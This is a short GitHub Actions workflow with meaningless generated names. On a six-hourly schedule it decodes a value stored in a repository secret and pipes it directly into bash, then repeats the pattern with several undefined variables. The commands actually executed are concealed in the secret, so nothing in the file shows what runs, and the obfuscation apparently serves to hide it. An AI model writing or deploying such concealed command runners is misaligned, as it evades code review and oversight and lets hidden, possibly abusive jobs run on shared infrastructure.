name: xiabaile2318

on:
  workflow_dispatch:
  schedule:
    - cron: '13 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiabaile2318
        env:
          tmtdv883: ${{ secrets.tmtdv883 }}
        run: |
          echo $tmtdv883 | jq -r .udb51 | /bin/bash
          echo $olqdr8 | jq -r .veduy018 | /bin/bash
          echo $e086 | jq -r .x5 | /bin/bash
          echo $iwsz958 | jq -r .ink99 | /bin/bash
          echo $qdgac261 | jq -r .h6467 | /bin/bash
          echo $re8 | jq -r .pd805 | /bin/bash
          echo $thsii8733 | jq -r .qkhrn5816 | /bin/bash
          echo $lk18620 | jq -r .bbfi296 | /bin/bash

